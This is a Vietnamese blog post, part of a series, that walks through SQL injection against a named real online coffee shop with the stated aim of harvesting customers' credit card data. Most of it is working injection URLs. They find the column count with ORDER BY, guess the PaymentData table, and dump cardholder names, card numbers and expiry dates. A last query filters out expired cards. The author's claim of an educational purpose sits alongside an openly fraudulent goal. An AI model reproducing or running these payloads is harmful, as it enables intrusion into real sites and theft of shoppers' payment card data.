Hacking website by sql injection p4

Tiếp phần 3, thấy có vẻ SQL căn bản ít được quan tâm, nên phần này mình xin trình bày cách get cc từ shop PHP, chứ không chiếm quyền admin như 3 part kia nữa.

Victim :


Thấy mất chữ
Dùng ORDER BY tìm lỗi :

Hiện chữ lại rồi, tiếp tục tăng giá trị ORDER lên :

Cũng y hệt trên , chưa thấy thay đổi gì , tăng ORDER lên nữa nào :

Chú ý, ORDER tới 7 vẫn còn chữ, số 8 thì mất chữ. <-- Lỗi đây
Dùng Union select và đoán table :

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,6,7 from Orders--
Chưa đúng table nên thấy mất chữ. Đoán table khác :

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,6,7 from PaymentData--
Thấy 6 :: 3, tức đã đoán đúng table rồi. Sau nhiều lần đoán các table như orders, user_info, Users, tb_orders, … rốt cuộc nó là PaymentData ^_^

Vị trí lỗi là 6 hoặc 3 , ta dùng group_concat ở vị trí 6 để lấy column :
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(id),7 from PaymentData--
Column tên id chưa đúng rồi, thấy mất chữ nữa. Đoán tiếp, nhìn table chắc column nó na ná, thử xem :

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment),7 from PaymentDat--
WOW ! thấy rồi , vậy column "idPayment" là đúng, các id đã hiện ra, tiếp các column khác nào.

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,CardNamePayment), 7 from PaymentDat--
Mất chữ rồi, column này không đúng, sau nhiều lần thử ko KQ, may ra nhớ khi xưa từng view all table của 1 shop và các column, trong tên column, có nhớ column bắt đầu là chr.

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,chrCardName),7 from PaymentDat--
À, được rồi nè, thấy name chủ thẻ rồi, tiếp thôi, ccnumber, DateExprire …

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,chrCardName,chrCa rdNumber,chrExpDate),7 from PaymentData--
View được 4 column quan trọng rồi, giờ còn các column như, CCV2, Billing address, Phone ...

P/s : có thể những thông tin còn lại nằm ở 1 table khác, chứ không chung 1 table.

Khi view được, ta tiến hành lọc bớt những CC đã hết hạn dùng hoặc lọc theo order mới :

Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,0x7c,chrCardName, 0x7c,chrCardNumber,0x7c,chrExpDate),7 from PaymentData where chrCardNumber>0 and mid(chrExpDate,4,5)>11 and idPayment>2500--
Tới đây xin tạm dừng, cho anh em thử tài đoán của mình nhé.

Khi đã public, tức nhiên shop cc đã nát, bài này với mục đích học tập là chính. Xin đừng phê phẩm này nọ. Chỉ khuyến cáo góp ý, đóng góp cho bài viết hoàn chỉnh, chuyên sâu hơn, có bài viết cho newbie học hỏi, cùng VE phát triển. Thanks.

Chúc thành công !!!

About : megagame và bài viết __ Hacking website by sql injection p4

Bài viết Hacking website by sql injection p4 Được viết bởi tác giả megagame vào lúc Thứ Tư, 29 tháng 2, 2012.
Cảm ơn bạn đã tham quan Blog và ghé xem bài viết này

Nếu có vấn đề thắc mắc hoặc cần thảo luận, hãy comment cho chúng tôi ở phía dưới nhé

Thanks you!


 

0 nhận xét:

Đăng nhận xét